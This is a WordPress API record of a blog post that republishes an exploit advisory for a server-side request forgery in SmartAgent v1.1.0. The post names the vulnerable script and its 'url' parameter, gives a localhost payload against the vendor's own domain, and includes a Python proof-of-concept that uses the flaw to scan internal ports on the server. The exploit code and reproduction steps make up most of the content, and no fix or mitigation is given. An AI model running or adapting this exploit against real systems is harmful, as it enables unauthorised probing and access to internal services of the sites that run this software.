{"id":60061,"date":"2024-11-02T05:13:42","date_gmt":"2024-11-02T02:13:42","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/182450\/smartagent110-ssrf.txt"},"modified":"2024-11-02T05:13:42","modified_gmt":"2024-11-02T02:13:42","slug":"smartagent-1-1-0-server-side-request-forgery","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/smartagent-1-1-0-server-side-request-forgery\/","title":{"rendered":"SmartAgent 1.1.0 Server-Side Request Forgery"},"content":{"rendered":"<p># Exploit Title: SmartAgent v1.1.0 &#8211; Server-Side Request Forgery (SSRF)<br \/># Date: 01-10-2024<br \/># Exploit Author: Alter Prime<br \/># Vendor Homepage: https:\/\/smarts-srlcom.com\/, https:\/\/smartagent.com<br \/># Version: Build v1.1.0<br \/># Tested on: Kali Linux<\/p>\n<p>An unauthenticated user can trigger the web server to perform web requests to the localhost via a GET request to the vulnerable script https:\/\/smarts-srlcom.com\/FB\/getFbVideoSource.php?url=http:\/\/127.0.0.1:80.<\/p>\n<p>The GET request includes the vulnerable parameter &#8220;url&#8221;.<\/p>\n<p>Steps To Reproduce:<br \/>1. 
Run the Python script below against a vulnerable SmartAgent v1.1.0 web application instance<\/p>\n<p>#Python Exploit<\/p>\n<p>import requests<\/p>\n<p>url = &quot;https:\/\/smartagent.[client].com\/FB\/getFbVideoSource.php&quot;<br \/>port = input(&quot;Enter the port you want to check: &quot;)<\/p>\n<p>parameter = {<br \/>&quot;url&quot;: &quot;http:\/\/127.0.0.1:&quot; + port<br \/>}<\/p>\n<p># The &quot;url&quot; parameter belongs in the query string, so it is passed as params= (data= would place it in a request body that the GET handler never reads)<br \/>response = requests.get(url, params=parameter, verify=False)<\/p>\n<p>if response.status_code == 200:<br \/>    print(f&quot;Port {port} is open on the server&quot;)<br \/>else:<br \/>    print(f&quot;Port {port} closed&quot;)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: SmartAgent v1.1.0 &#8211; Server-Side Request Forgery (SSRF)# Date: 01-10-2024# Exploit Author: Alter Prime# Vendor Homepage: https:\/\/smarts-srlcom.com\/, https:\/\/smartagent.com# Version: Build v1.1.0# Tested on: Kali Linux An unauthenticated user can trigger the web server to perform web requests to the localhost via a GET request to the vulnerable script https:\/\/smarts-srlcom.com\/FB\/getFbVideoSource.php?url=http:\/\/127.0.0.1:80. 
The GET request includes &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-60061","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60061","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=60061"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60061\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=60061"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=60061"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=60061"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}